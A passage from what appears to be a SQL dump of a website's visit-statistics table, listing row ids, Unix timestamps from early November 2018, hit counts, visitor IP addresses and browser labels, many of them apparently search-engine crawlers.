rome'),(323248,1541058749,1,1,0,0,'46.229.168.130','other'),(323249,1541058966,1,1,0,0,'54.36.148.76','other'),(323250,1541059028,2,2,0,0,'207.46.13.222','other'),(323251,1541059244,1,1,0,0,'54.36.149.35','other'),(323252,1541059308,2,2,0,0,'216.244.66.241','other'),(323253,1541059372,2,2,0,0,'91.196.178.79','chrome'),(323254,1541059450,1,1,0,0,'54.36.148.63','other'),(323255,1541059496,1,1,0,0,'54.36.148.14','other'),(323256,1541059498,1,1,0,0,'54.36.148.40','other'),(323257,1541059761,1,1,0,0,'54.165.59.7','other'),(323258,1541059850,1,1,0,0,'54.36.148.255','other'),(323259,1541059869,1,1,0,0,'54.36.148.224','other'),(323260,1541060002,1,1,0,0,'46.229.168.151','other'),(323261,1541060085,1,1,0,0,'95.132.247.62','chrome'),(323262,1541060393,1,1,0,0,'54.36.148.122','other'),(323263,1541060562,1,1,0,0,'54.36.148.221','other'),(323264,1541060811,1,1,0,0,'54.36.148.238','other'),(323265,1541061084,2,2,0,0,'66.249.75.201','chrome'),(323266,1541061085,1,1,0,0,'66.249.75.222','chrome'),(323267,1541061158,1,1,0,0,'54.36.148.205','other'),(323268,1541061563,3,3,0,0,'95.134.203.247','chrome'),(323269,1541061649,1,1,0,0,'8.29.198.27','other'),(323270,1541061926,6,6,0,0,'66.249.75.218','chrome'),(323271,1541061937,6,6,0,0,'66.249.75.195','chrome'),(323273,1541061975,1,1,0,0,'54.36.149.100','other'),(323274,1541062036,5,5,0,0,'66.249.75.220','chrome'),(323275,1541062048,1,1,0,0,'54.36.148.129','other'),(323276,1541062053,1,1,0,0,'193.106.30.98','firefox'),(323277,1541062079,4,4,0,0,'91.196.179.134','chrome'),(323278,1541062080,4,4,0,0,'66.249.75.199','chrome'),(323279,1541062147,3,3,0,0,'66.249.75.201','chrome'),(323280,1541062148,2,2,0,0,'66.249.75.222','chrome'),(323281,1541062183,2,2,0,0,'91.196.178.70','firefox'),(323282,1541062464,2,2,0,0,'216.244.66.241','other'),(323283,1541062675,1,1,0,0,'91.196.178.79','chrome'),(323284,1541062689,1,1,0,0,'54.36.149.18','other'),(323285,1541063037,1,1,0,0,'54.36.148.84','other'),(323286,1541063138,1,1,0,0,'54.36.148.108','other'),(323287,1541063604,1,1,0,0,'54.36.149.105','other'),(323288,1541063737,1,1,0,0,'8.29.198.26','other'),(323289,1541063741,1,1,0,0,'95.163.255.94','other'),(323290,1541063744,1,1,0,0,'95.163.255.97','other'),(323291,1541063778,1,1,0,0,'54.36.148.27','other'),(323292,1541063780,1,1,0,0,'54.165.59.7','other'),(323293,1541063852,1,1,0,0,'66.249.75.199','chrome'),(323294,1541063853,1,1,0,0,'66.249.75.220','chrome'),(323295,1541064026,1,1,0,0,'8.29.198.27','other'),(323296,1541064047,2,2,0,0,'130.180.219.33','chrome'),(323297,1541064555,2,2,0,0,'91.196.177.46','chrome'),(323298,1541064581,1,1,0,0,'54.36.148.205','other'),(323299,1541064770,1,1,0,0,'54.36.148.199','other'),(323300,1541064818,1,1,0,0,'54.36.149.18','other'),(323301,1541064990,1,1,0,0,'54.36.148.43','other'),(323302,1541065308,1,1,0,0,'54.36.149.90','other'),(323303,1541065443,2,2,0,0,'91.196.178.79','chrome'),(323304,1541065893,1,1,0,0,'54.36.149.68','other'),(323305,1541065922,1,1,0,0,'66.249.75.195','chrome'),(323306,1541065923,1,1,0,0,'66.249.75.222','chrome'),(323307,1541065959,2,2,0,0,'91.196.178.169','chrome'),(323308,1541065975,1,1,0,0,'54.36.149.100','other'),(323309,1541066007,1,1,0,0,'54.36.148.46','other'),(323310,1541066293,1,1,0,0,'54.36.148.11','other'),(323311,1541066532,1,1,0,0,'66.249.75.16','chrome'),(323312,1541066687,3,3,0,0,'66.249.75.199','chrome'),(323313,1541066688,1,1,0,0,'66.249.75.220','chrome'),(323314,1541066838,1,1,0,0,'54.36.148.35','other'),(323315,1541066942,1,1,0,0,'66.249.75.222','chrome'),(323316,1541067152,2,2,0,0,'66.249.75.218','chrome'),(323317,1541067576,1,1,0,0,'54.36.149.102','other'),(323318,1541067737,1,1,0,0,'54.36.148.160','other'),(323319,1541067954,1,1,0,0,'46.229.168.147','other'),(323320,1541067956,1,1,0,0,'46.229.168.138','other'),(323321,1541068001,2,2,0,0,'46.219.6.40','chrome'),(323322,1541068010,1,1,0,0,'46.229.168.136','other'),(323323,1541068015,1,1,0,0,'66.249.75.195','chrome'),(323324,1541068425,1,1,0,0,'66.249.69.144','chrome'),(323325,1541068702,17,17,0,0,'178.154.244.11','other'),(323326,1541068712,1,1,0,0,'54.36.148.157','other'),(323327,1541068714,17,17,0,0,'178.154.244.29','other'),(323328,1541068846,2,2,0,0,'87.250.224.47','other'),(323329,1541068918,3,3,0,0,'5.45.207.79','other'),(323330,1541069482,1,1,0,0,'46.229.168.136','other'),(323331,1541069484,1,1,0,0,'46.229.168.147','other'),(323332,1541069522,1,1,0,0,'66.249.75.195','chrome'),(323333,1541069523,1,1,0,0,'66.249.75.222','chrome'),(323334,1541069592,2,2,0,0,'18.195.116.186','other'),(323335,1541069648,1,1,0,0,'54.36.148.141','other'),(323336,1541069674,2,2,0,0,'37.53.173.187','chrome'),(323337,1541069725,14,14,0,0,'178.154.244.11','other'),(323338,1541069809,26,26,0,0,'178.154.244.29','other'),(323339,1541069867,5,5,0,0,'5.45.207.79','other'),(323340,1541069888,1,1,0,0,'54.36.148.131','other'),(323341,1541069898,2,2,0,0,'5.45.207.19','other'),(323342,1541069936,1,1,0,0,'54.36.149.4','other'),(323343,1541070100,1,1,0,0,'157.55.39.56','other'),(323344,1541070110,1,1,0,0,'37.9.113.148','other'),(323345,1541070261,2,2,0,0,'91.196.178.169','chrome'),(323346,1541070445,1,1,0,0,'54.36.148.173','other'),(323347,1541070480,1,1,0,0,'87.250.224.47','other'),(323348,1541070482,2,2,0,0,'31.43.60.176','chrome'),(323349,1541070657,16,16,0,0,'178.154.244.11','other'),(323350,1541070712,16,16,0,0,'178.154.244.29','other'),(323351,1541070892,1,1,0,0,'5.45.207.79','other'),(323352,1541070916,2,2,0,0,'66.249.75.15','chrome'),(323353,1541070960,1,1,0,0,'66.249.75.28','chrome'),(323354,1541071625,14,14,0,0,'178.154.244.29','other'),(323355,1541071629,3,3,0,0,'178.154.244.11','other'),(323356,1541071677,1,1,0,0,'141.8.142.103','other'),(323357,1541071705,1,1,0,0,'46.229.168.130','other'),(323359,1541071742,1,1,0,0,'141.8.142.38','other'),(323360,1541071743,1,1,0,0,'213.180.203.9','other'),(323361,1541071838,1,1,0,0,'87.250.224.65','other'),(323362,1541072075,1,1,0,0,'5.45.207.79','other'),(323363,1541072408,1,1,0,0,'46.201.239.67','chrome'),(323364,1541072482,1,1,0,0,'8.29.198.26','other'),(323365,1541072754,1,1,0,0,'54.36.148.210','other'),(323366,1541072765,1,1,0,0,'178.154.244.29','other'),(323367,1541073253,1,1,0,0,'54.36.148.235','other'),(323368,1541073397,1,1,0,0,'54.36.148.198','other'),(323369,1541073607,1,1,0,0,'154.41.3.190','chrome'),(323370,1541073780,1,1,0,0,'54.36.148.27','other'),(323371,1541073968,1,1,0,0,'54.36.149.29','other'),(323372,1541074032,1,1,0,0,'54.36.149.45','other'),(323373,1541074071,2,2,0,0,'66.249.75.201','chrome'),(323374,1541074072,1,1,0,0,'66.249.75.222','chrome'),(323375,1541074074,1,1,0,0,'54.36.148.88','other'),(323376,1541074093,1,1,0,0,'66.249.75.220','chrome'),(323377,1541074104,2,2,0,0,'66.249.75.199','chrome'),(323379,1541074148,1,1,0,0,'66.249.75.218','chrome'),(323380,1541074337,2,2,0,0,'46.201.122.90','chrome'),(323381,1541074503,1,1,0,0,'54.36.148.217','other'),(323382,1541074607,2,2,0,0,'8.29.198.26','other'),(323383,1541074626,1,1,0,0,'54.36.149.36','other'),(323384,1541074790,1,1,0,0,'95.163.255.97','other'),(323385,1541074793,1,1,0,0,'95.163.255.95','other'),(323386,1541075218,1,1,0,0,'54.36.149.80','other'),(323387,1541075302,2,2,0,0,'216.244.66.241','other'),(323388,1541075367,1,1,0,0,'54.36.148.19','other'),(323389,1541075724,2,2,0,0,'91.196.178.169','chrome'),(323390,1541075820,2,2,0,0,'66.249.75.201','chrome'),(323391,1541075821,3,3,0,0,'66.249.75.220','chrome'),(323392,1541075997,2,2,0,0,'66.249.75.199','chrome'),(323393,1541076085,2,2,0,0,'66.249.75.195','chrome'),(323394,1541076087,1,1,0,0,'66.249.75.222','chrome'),(323395,1541076264,2,2,0,0,'66.249.75.218','chrome'),(323396,1541076308,1,1,0,0,'54.36.148.58','other'),(323397,1541076623,5,5,0,0,'91.196.178.79','chrome'),(323398,1541076731,2,2,0,0,'178.154.244.29','other'),(323399,1541077204,3,3,0,0,'66.249.75.199','chrome'),(323400,1541077205,1,1,0,0,'66.249.75.218','chrome'),(323401,1541077277,1,1,0,0,'216.244.66.241','other'),(323402,1541077359,1,1,0,0,'66.249.75.220','chrome'),(323403,1541077614,2,2,0,0,'66.249.75.222','chrome'),(323404,1541077624,1,1,0,0,'54.36.149.68','other'),(323405,1541077669,1,1,0,0,'66.249.75.195','chrome'),(323406,1541077766,1,1,0,0,'54.36.148.165','other'),(323407,1541078209,1,1,0,0,'54.36.148.99','other'),(323408,1541078303,1,1,0,0,'54.36.148.252','other'),(323409,1541078531,1,1,0,0,'54.36.148.185','other'),(323410,1541078703,1,1,0,0,'54.36.149.66','other'),(323411,1541078885,4,4,0,0,'178.154.244.29','other'),(323412,1541078887,2,2,0,0,'66.249.75.199','chrome'),(323413,1541078888,2,2,0,0,'66.249.75.218','chrome'),(323414,1541078918,1,1,0,0,'40.77.167.99','other'),(323415,1541078989,3,3,0,0,'178.154.244.11','other'),(323416,1541079086,2,2,0,0,'66.249.75.201','chrome'),(323417,1541079087,1,1,0,0,'66.249.75.222','chrome'),(323418,1541079197,2,2,0,0,'66.249.75.16','chrome'),(323419,1541079212,1,1,0,0,'54.36.148.71','other'),(323420,1541079245,1,1,0,0,'54.36.148.157','other'),(323421,1541079398,1,1,0,0,'54.36.149.98','other'),(323422,1541079704,2,2,0,0,'216.244.66.241','other'),(323423,1541079796,1,1,0,0,'54.36.149.47','other'),(323424,1541079820,1,1,0,0,'54.36.148.93','other'),(323425,1541080257,1,1,0,0,'178.154.244.29','other'),(323426,1541080297,1,1,0,0,'54.36.148.223','other'),(323427,1541080340,1,1,0,0,'95.163.255.92','other'),(323428,1541080343,1,1,0,0,'95.163.255.96','other'),(323429,1541080547,2,2,0,0,'178.154.244.11','other'),(323430,1541080631,1,1,0,0,'51.255.65.46','other'),(323431,1541080714,1,1,0,0,'91.196.178.135','firefox'),(323432,1541081114,1,1,0,0,'66.249.75.201','chrome'),(323433,1541081134,1,1,0,0,'66.249.75.195','chrome'),(323434,1541081136,1,1,0,0,'66.249.75.218','chrome'),(323435,1541081200,1,1,0,0,'54.36.148.178','other'),(323436,1541081340,1,1,0,0,'66.249.75.199','chrome'),(323437,1541081367,1,1,0,0,'54.36.148.230','other'),(323438,1541081400,1,1,0,0,'66.249.75.220','chrome'),(323439,1541081652,2,2,0,0,'178.154.244.29','other'),(323440,1541081658,3,3,0,0,'91.196.178.79','chrome'),(323441,1541081823,1,1,0,0,'54.36.149.2','other'),(323442,1541081912,1,1,0,0,'54.36.148.225','other'),(323443,1541082900,2,2,0,0,'178.154.244.29','other'),(323444,1541083319,1,1,0,0,'54.36.148.49','other'),(323445,1541083323,1,1,0,0,'8.29.198.26','other'),(323446,1541084117,1,1,0,0,'54.36.148.247','other'),(323447,1541084118,1,1,0,0,'66.249.75.199','chrome'),(323448,1541084127,1,1,0,0,'66.249.75.218','chrome'),(323449,1541084267,1,1,0,0,'54.36.148.231','other'),(323450,1541084630,1,1,0,0,'54.36.149.25','other'),(323451,1541084817,1,1,0,0,'46.229.168.152','other'),(323452,1541084819,1,1,0,0,'46.229.168.136','other'),(323453,1541084822,1,1,0,0,'46.229.168.129','other'),(323454,1541084895,1,1,0,0,'66.249.75.195','chrome'),(323455,1541085028,2,2,0,0,'91.196.178.79','chrome'),(323456,1541085131,1,1,0,0,'207.46.13.117','other'),(323457,1541085269,1,1,0,0,'54.36.148.101','other'),(323458,1541085335,2,2,0,0,'178.154.244.11','other'),(323459,1541085472,1,1,0,0,'8.29.198.25','other'),(323460,1541085479,1,1,0,0,'40.77.167.99','other'),(323461,1541085597,1,1,0,0,'54.36.149.104','other'),(323462,1541085627,1,1,0,0,'66.249.75.201','chrome'),(323463,1541085628,1,1,0,0,'66.249.75.218','chrome'),(323464,1541085636,3,3,0,0,'178.154.244.29','other'),(323465,1541085690,1,1,0,0,'66.249.75.199','chrome'),(323466,1541085691,3,3,0,0,'66.249.75.220','chrome'),(323467,1541085833,1,1,0,0,'8.29.198.27','other'),(323468,1541085918,1,1,0,0,'116.113.110.252','chrome'),(323469,1541086089,1,1,0,0,'5.45.207.79','other'),(323470,1541086354,1,1,0,0,'66.249.75.222','chrome'),(323471,1541086360,1,1,0,0,'91.196.178.79','chrome'),(323472,1541086361,1,1,0,0,'93.78.215.239','chrome'),(323473,1541086475,2,2,0,0,'216.244.66.241','other'),(323474,1541086526,1,1,0,0,'178.154.244.11','other'),(323475,1541086687,1,1,0,0,'54.36.148.235','other'),(323476,1541086692,1,1,0,0,'188.230.43.254','other'),(323477,1541087235,2,2,0,0,'92.113.195.75','chrome'),(323478,1541087624,1,1,0,0,'46.229.168.151','other'),(323479,1541087625,1,1,0,0,'91.196.178.161','chrome'),(323480,1541087627,1,1,0,0,'46.229.168.152','other'),(323481,1541087719,1,1,0,0,'40.77.167.99','other'),(323482,1541087744,2,2,0,0,'216.244.66.241','other'),(323483,1541087924,1,1,0,0,'54.36.149.48','other'),(323484,1541088402,1,1,0,0,'54.36.148.156','other'),(323485,1541088440,1,1,0,0,'37.9.113.20','other'),(323486,1541088872,1,1,0,0,'178.154.244.11','other'),(323487,1541088979,1,1,0,0,'188.230.43.254','other'),(323488,1541089060,1,1,0,0,'54.36.148.45','other'),(323489,1541089113,1,1,0,0,'54.36.148.17','other'),(323490,1541089548,1,1,0,0,'54.36.148.243','other'),(323491,1541089591,1,1,0,0,'40.77.167.99','other'),(323492,1541089645,1,1,0,0,'54.36.148.54','other'),(323493,1541089707,1,1,0,0,'54.36.148.140','other'),(323494,1541089800,1,1,0,0,'54.36.149.81','other'),(323495,1541089830,1,1,0,0,'54.36.148.33','other'),(323496,1541089991,1,1,0,0,'46.229.168.152','other'),(323497,1541089993,1,1,0,0,'46.229.168.142','other'),(323498,1541090034,3,3,0,0,'66.249.75.199','chrome'),(323499,1541090035,3,3,0,0,'66.249.75.222','chrome'),(323500,1541090091,1,1,0,0,'66.249.75.195','chrome'),(323501,1541090098,1,1,0,0,'66.249.75.218','chrome'),(323502,1541090210,1,1,0,0,'66.249.75.220','chrome'),(323503,1541090433,1,1,0,0,'54.36.148.14','other'),(323504,1541090520,1,1,0,0,'54.36.149.17','other'),(323505,1541090555,2,2,0,0,'91.196.178.90','firefox'),(323506,1541090708,1,1,0,0,'66.249.75.13','chrome'),(323507,1541090751,1,1,0,0,'54.36.148.191','other'),(323508,1541091128,1,1,0,0,'66.249.75.218','chrome'),(323509,1541091204,2,2,0,0,'40.77.167.99','other'),(323510,1541091374,1,1,0,0,'54.36.149.13','other'),(323511,1541091378,1,1,0,0,'188.230.43.254','other'),(323512,1541091636,1,1,0,0,'46.229.168.154','other'),(323513,1541091638,1,1,0,0,'46.229.168.138','other'),(323514,1541091816,1,1,0,0,'54.36.148.213','other'),(323515,1541092494,1,1,0,0,'54.36.148.93','other'),(323516,1541092635,1,1,0,0,'54.36.148.161','other'),(323517,1541092771,1,1,0,0,'54.36.149.44','other'),(323518,1541093152,1,1,0,0,'54.36.148.193','other'),(323519,1541093430,1,1,0,0,'95.163.255.112','other'),(323520,1541093436,1,1,0,0,'95.163.255.108','other'),(323521,1541093724,1,1,0,0,'91.196.178.98','chrome'),(323522,1541093858,1,1,0,0,'207.46.13.216','other'),(323523,1541094145,1,1,0,0,'54.36.149.100','other'),(323524,1541094172,1,1,0,0,'8.29.198.27','other'),(323525,1541094194,3,3,0,0,'216.244.66.241','other'),(323526,1541094236,1,1,0,0,'54.36.148.155','other'),(323527,1541094440,1,1,0,0,'46.229.168.135','other'),(323528,1541094814,1,1,0,0,'66.249.75.195','chrome'),(323529,1541094815,1,1,0,0,'66.249.75.218','chrome'),(323530,1541095058,1,1,0,0,'54.36.149.56','other'),(323531,1541095069,1,1,0,0,'54.36.148.146','other'),(323532,1541095135,1,1,0,0,'66.249.75.220','chrome'),(323533,1541095249,1,1,0,0,'54.36.148.27','other'),(323534,1541095390,1,1,0,0,'66.249.75.13','chrome'),(323535,1541095568,3,3,0,0,'66.249.75.15','chrome'),(323536,1541095644,1,1,0,0,'216.244.66.241','other'),(323537,1541095654,1,1,0,0,'54.36.148.210','other'),(323538,1541095974,1,1,0,0,'54.36.148.212','other'),(323539,1541096056,1,1,0,0,'54.36.148.54','other'),(323540,1541096173,2,2,0,0,'46.211.127.14','chrome'),(323541,1541096177,8,8,0,0,'178.154.244.11','other'),(323542,1541096198,1,1,0,0,'66.249.75.30','chrome'),(323543,1541096216,1,1,0,0,'54.36.148.179','other'),(323544,1541096270,44,44,0,0,'178.154.244.29','other'),(323545,1541096300,1,1,0,0,'54.36.149.43','other'),(323546,1541096340,1,1,0,0,'8.29.198.25','other'),(323547,1541096718,1,1,0,0,'8.29.198.27','other'),(323548,1541097003,1,1,0,0,'141.8.142.103','other'),(323549,1541097130,13,13,0,0,'178.154.244.11','other'),(323550,1541097151,1,1,0,0,'54.36.149.14','other'),(323551,1541097198,30,30,0,0,'178.154.244.29','other'),(323552,1541097534,2,2,0,0,'216.244.66.241','other'),(323553,1541097723,1,1,0,0,'5.45.207.19','other'),(323554,1541097759,1,1,0,0,'66.249.75.15','chrome'),(323555,1541097792,1,1,0,0,'207.46.13.216','other'),(323556,1541097800,1,1,0,0,'91.196.178.98','chrome'),(323557,1541098014,1,1,0,0,'66.249.75.218','chrome'),(323558,1541098056,18,18,0,0,'178.154.244.11','other'),(323559,1541098121,39,39,0,0,'178.154.244.29','other'),(323560,1541098140,3,3,0,0,'5.45.207.79','other'),(323561,1541098185,1,1,0,0,'5.45.207.8','other'),(323562,1541098260,1,1,0,0,'87.250.224.47','other'),(323563,1541098760,1,1,0,0,'91.225.58.228','chrome'),(323564,1541098786,1,1,0,0,'5.45.207.19','other'),(323565,1541099026,2,2,0,0,'178.154.244.11','other'),(323566,1541099113,1,1,0,0,'54.36.148.130','other'),(323567,1541099297,4,4,0,0,'91.196.178.35','chrome'),(323568,1541099364,9,9,0,0,'178.154.244.29','other'),(323569,1541099445,1,1,0,0,'54.36.149.91','other'),(323570,1541100344,4,4,0,0,'178.154.244.29','other'),(323571,1541100374,1,1,0,0,'54.36.148.134','other'),(323572,1541100503,3,3,0,0,'178.154.244.11','other'),(323573,1541100565,1,1,0,0,'54.36.148.239','other'),(323574,1541100571,1,1,0,0,'37.73.241.252','other'),(323575,1541100756,1,1,0,0,'54.36.148.11','other'),(323576,1541101194,1,1,0,0,'54.36.149.73','other'),(323577,1541101413,2,2,0,0,'178.154.244.29','other'),(323578,1541101462,1,1,0,0,'40.77.167.99','other'),(323579,1541101516,1,1,0,0,'66.249.75.15','chrome'),(323580,1541101581,1,1,0,0,'95.163.255.95','other'),(323581,1541101584,1,1,0,0,'95.163.255.99','other'),(323582,1541101898,1,1,0,0,'54.36.148.13','other'),(323583,1541102418,1,1,0,0,'207.46.13.216','other'),(323584,1541102854,1,1,0,0,'54.36.148.248','other'),(323585,1541102912,1,1,0,0,'66.249.75.16','chrome'),(323586,1541102994,1,1,0,0,'207.46.13.117','other'),(323587,1541103005,5,5,0,0,'178.154.244.29','other'),(323588,1541103022,1,1,0,0,'66.249.75.222','chrome'),(323589,1541103333,1,1,0,0,'216.244.66.241','other'),(323590,1541103458,1,1,0,0,'178.154.244.11','other'),(323591,1541103543,1,1,0,0,'66.249.75.13','chrome'),(323592,1541103654,1,1,0,0,'54.36.148.207','other'),(323593,1541103691,1,1,0,0,'54.36.148.232','other'),(323594,1541103868,1,1,0,0,'54.36.148.235','other'),(323595,1541103910,1,1,0,0,'46.229.168.139','other'),(323596,1541103975,1,1,0,0,'54.36.148.38','other'),(323597,1541104256,5,5,0,0,'178.154.244.29','other'),(323598,1541104284,1,1,0,0,'54.36.148.193','other'),(323599,1541104614,1,1,0,0,'54.36.148.127','other'),(323600,1541104839,1,1,0,0,'95.163.255.94','other'),(323601,1541104842,1,1,0,0,'95.163.255.98','other'),(323602,1541105010,1,1,0,0,'8.29.198.27','other'),(323604,1541105099,3,3,0,0,'178.154.244.11','other'),(323605,1541105136,1,1,0,0,'54.36.148.68','other'),(323606,1541105261,2,2,0,0,'216.244.66.241','other'),(323607,1541105637,8,8,0,0,'178.154.244.29','other'),(323608,1541105895,1,1,0,0,'54.36.149.81','other'),(323609,1541106276,1,1,0,0,'54.36.148.82','other'),(323610,1541106370,1,1,0,0,'213.180.203.9','other'),(323611,1541106685,1,1,0,0,'178.154.244.11','other'),(323612,1541106720,1,1,0,0,'40.77.167.99','other'),(323613,1541107068,3,3,0,0,'178.154.244.29','other'),(323614,1541107151,1,1,0,0,'54.36.148.110','other'),(323615,1541107156,1,1,0,0,'54.36.148.91','other'),(323616,1541107197,1,1,0,0,'8.29.198.25','other'),(323617,1541107471,1,1,0,0,'54.36.148.113','other'),(323618,1541107552,1,1,0,0,'54.36.148.102','other'),(323619,1541107596,1,1,0,0,'8.29.198.26','other'),(323620,1541107778,1,1,0,0,'46.211.148.15','chrome'),(323621,1541107908,1,1,0,0,'54.36.148.141','other'),(323622,1541108076,1,1,0,0,'54.36.149.7','other'),(323623,1541108173,1,1,0,0,'54.36.149.44','other'),(323624,1541108241,2,2,0,0,'178.154.244.29','other'),(323625,1541108332,1,1,0,0,'54.36.148.175','other'),(323626,1541108343,1,1,0,0,'54.36.148.100','other'),(323627,1541108630,1,1,0,0,'54.36.148.51','other'),(323628,1541108658,1,1,0,0,'54.36.148.241','other'),(323629,1541108947,1,1,0,0,'54.36.148.148','other'),(323630,1541108957,1,1,0,0,'5.45.207.79','other'),(323631,1541109081,1,1,0,0,'54.36.149.89','other'),(323632,1541109173,2,2,0,0,'178.154.244.29','other'),(323633,1541109406,1,1,0,0,'54.36.149.52','other'),(323634,1541109731,1,1,0,0,'54.36.148.177','other'),(323635,1541109772,1,1,0,0,'54.36.148.228','other'),(323636,1541109927,1,1,0,0,'54.36.148.168','other'),(323637,1541111152,2,2,0,0,'5.45.207.19','other'),(323638,1541111218,3,3,0,0,'178.154.244.29','other'),(323639,1541111440,1,1,0,0,'54.36.148.169','other'),(323640,1541111732,1,1,0,0,'54.36.148.163','other'),(323641,1541111743,1,1,0,0,'54.36.148.150','other'),(323642,1541111939,1,1,0,0,'51.255.65.46','other'),(323643,1541112119,1,1,0,0,'54.36.148.113','other'),(323644,1541112122,1,1,0,0,'54.36.149.35','other'),(323645,1541112800,3,3,0,0,'216.244.66.241','other'),(323646,1541112952,1,1,0,0,'54.36.148.234','other'),(323647,1541113062,1,1,0,0,'157.55.39.197','other'),(323648,1541113707,1,1,0,0,'66.249.75.201','chrome'),(323649,1541113708,1,1,0,0,'66.249.75.220','chrome'),(323650,1541113712,1,1,0,0,'46.229.168.130','other'),(323651,1541113828,1,1,0,0,'66.249.75.195','chrome'),(323652,1541113829,1,1,0,0,'66.249.75.218','chrome'),(323653,1541113922,1,1,0,0,'46.229.168.135','other'),(323654,1541113923,1,1,0,0,'46.229.168.153','other'),(323655,1541114107,1,1,0,0,'54.36.148.52','other'),(323656,1541114129,1,1,0,0,'54.36.148.143','other'),(323657,1541114383,1,1,0,0,'54.36.149.104','other'),(323658,1541114398,1,1,0,0,'54.36.149.74','other'),(323659,1541114450,1,1,0,0,'54.36.148.83','other'),(323660,1541114560,1,1,0,0,'54.36.148.65','other'),(323661,1541114785,1,1,0,0,'54.36.148.34','other'),(323662,1541114843,1,1,0,0,'54.36.148.16','other'),(323663,1541114887,1,1,0,0,'54.36.148.115','other'),(323664,1541114930,1,1,0,0,'54.36.148.204','other'),(323665,1541115247,1,1,0,0,'54.36.149.37','other'),(323666,1541115275,1,1,0,0,'54.36.148.64','other'),(323667,1541115910,1,1,0,0,'66.249.75.201','chrome'),(323668,1541115918,1,1,0,0,'66.249.75.220','chrome'),(323669,1541116196,1,1,0,0,'54.36.149.35','other'),(323670,1541116520,1,1,0,0,'62.205.134.182','other'),(323671,1541116664,1,1,0,0,'8.29.198.25','other'),(323672,1541116722,1,1,0,0,'54.36.148.67','other'),(323673,1541116742,1,1,0,0,'216.244.66.241','other'),(323674,1541116761,1,1,0,0,'54.36.148.207','other'),(323675,1541116832,1,1,0,0,'54.36.149.78','other'),(323676,1541117076,1,1,0,0,'46.229.168.143','other'),(323677,1541117078,1,1,0,0,'46.229.168.133','other'),(323678,1541117158,1,1,0,0,'66.249.75.201','chrome'),(323679,1541117159,1,1,0,0,'66.249.75.218','chrome'),(323680,1541117160,2,2,0,0,'178.154.244.29','other'),(323681,1541117176,1,1,0,0,'5.45.207.79','other'),(323682,1541117356,1,1,0,0,'5.45.207.19','other'),(323683,1541117479,3,3,0,0,'178.154.244.11','other'),(323684,1541117491,1,1,0,0,'66.249.75.30','chrome'),(323685,1541117492,1,1,0,0,'66.249.75.16','chrome'),(323686,1541117696,1,1,0,0,'54.36.148.119','other'),(323687,1541118066,1,1,0,0,'8.29.198.26','other'),(323688,1541118178,1,1,0,0,'216.244.66.241','other'),(323689,1541118183,1,1,0,0,'54.36.148.86','other'),(323690,1541118232,1,1,0,0,'66.249.75.199','chrome'),(323691,1541118250,1,1,0,0,'54.36.148.163','other'),(323692,1541118259,4,4,0,0,'95.163.255.97','other'),(323693,1541118294,53,53,0,0,'178.154.244.29','other'),(323694,1541118346,5,5,0,0,'5.45.207.79','other'),(323695,1541118350,1,1,0,0,'54.36.149.78','other'),(323696,1541118378,1,1,0,0,'54.36.148.221','other'),(323697,1541118405,20,20,0,0,'178.154.244.11','other'),(323698,1541118476,1,1,0,0,'8.29.198.27','other'),(323699,1541118738,1,1,0,0,'178.154.244.65','other'),(323700,1541118746,1,1,0,0,'5.45.207.19','other'),(323701,1541118772,1,1,0,0,'54.36.148.178','other'),(323702,1541118782,1,1,0,0,'46.229.168.142','other'),(323703,1541118784,1,1,0,0,'46.229.168.137','other'),(323704,1541119145,1,1,0,0,'54.36.149.69','other'),(323705,1541119182,1,1,0,0,'54.36.148.251','other'),(323706,1541119197,41,41,0,0,'178.154.244.29','other'),(323707,1541119278,5,5,0,0,'5.45.207.79','other'),(323708,1541119308,23,23,0,0,'178.154.244.11','other'),(323709,1541119367,1,1,0,0,'54.36.148.105','other'),(323710,1541119503,1,1,0,0,'54.36.148.153','other'),(323711,1541119653,1,1,0,0,'54.36.148.214','other'),(323712,1541119671,4,4,0,0,'141.8.142.103','other'),(323713,1541119761,3,3,0,0,'5.45.207.19','other'),(323714,1541120061,1,1,0,0,'141.8.142.108','other'),(323715,1541120147,11,11,0,0,'178.154.244.29','other'),(323716,1541120171,2,2,0,0,'87.250.224.47','other'),(323717,1541120249,6,6,0,0,'178.154.244.11','other'),(323718,1541120446,1,1,0,0,'54.36.148.183','other'),(323719,1541120538,1,1,0,0,'54.36.149.62','other'),(323720,1541120594,2,2,0,0,'216.244.66.241','other'),(323721,1541120697,1,1,0,0,'54.36.148.29','other'),(323722,1541120780,1,1,0,0,'54.36.149.85','other'),(323723,1541120972,1,1,0,0,'66.249.75.199','chrome'),(323724,1541120973,3,3,0,0,'66.249.75.222','chrome'),(323725,1541121488,1,1,0,0,'95.163.255.99','other'),(323726,1541121495,1,1,0,0,'95.163.255.93','other'),(323727,1541121579,1,1,0,0,'54.36.148.67','other'),(323728,1541122020,1,1,0,0,'54.36.148.116','other'),(323729,1541122088,1,1,0,0,'54.36.148.182','other'),(323730,1541122166,1,1,0,0,'54.36.149.81','other'),(323731,1541122296,1,1,0,0,'54.36.148.200','other'),(323732,1541122549,1,1,0,0,'178.154.244.11','other'),(323733,1541122565,6,6,0,0,'178.154.244.29','other'),(323734,1541122567,1,1,0,0,'40.77.167.99','other'),(323735,1541123080,1,1,0,0,'46.229.168.152','other'),(323736,1541123083,1,1,0,0,'46.229.168.143','other'),(323737,1541123230,1,1,0,0,'95.163.255.117','other'),(323738,1541123237,2,2,0,0,'95.163.255.105','other'),(323739,1541123249,3,3,0,0,'95.163.255.109','other'),(323740,1541123259,2,2,0,0,'95.163.255.113','other'),(323741,1541123276,1,1,0,0,'95.163.255.112','other'),(323742,1541123287,2,2,0,0,'95.163.255.118','other'),(323743,1541123326,1,1,0,0,'95.163.255.104','other'),(323744,1541123397,1,1,0,0,'54.36.148.209','other'),(323745,1541123508,7,7,0,0,'178.154.244.29','other'),(323746,1541124012,1,1,0,0,'54.36.148.218','other'),(323747,1541124034,2,2,0,0,'178.154.244.11','other'),(323748,1541124127,1,1,0,0,'46.229.168.134','other'),(323749,1541124129,1,1,0,0,'46.229.168.129','other'),(323750,1541124172,1,1,0,0,'54.36.148.137','other'),(323751,1541124189,2,2,0,0,'40.77.167.99','other'),(323752,1541124355,1,1,0,0,'54.36.148.54','other'),(323753,1541124496,4,4,0,0,'178.154.244.29','other'),(323754,1541124803,2,2,0,0,'34.211.39.38','chrome'),(323755,1541125141,1,1,0,0,'54.36.148.101','other'),(323756,1541125263,1,1,0,0,'54.36.148.242','other'),(323757,1541125265,2,2,0,0,'178.154.244.11','other'),(323758,1541125377,1,1,0,0,'54.36.149.87','other'),(323759,1541125557,8,8,0,0,'178.154.244.29','other'),(323760,1541125745,1,1,0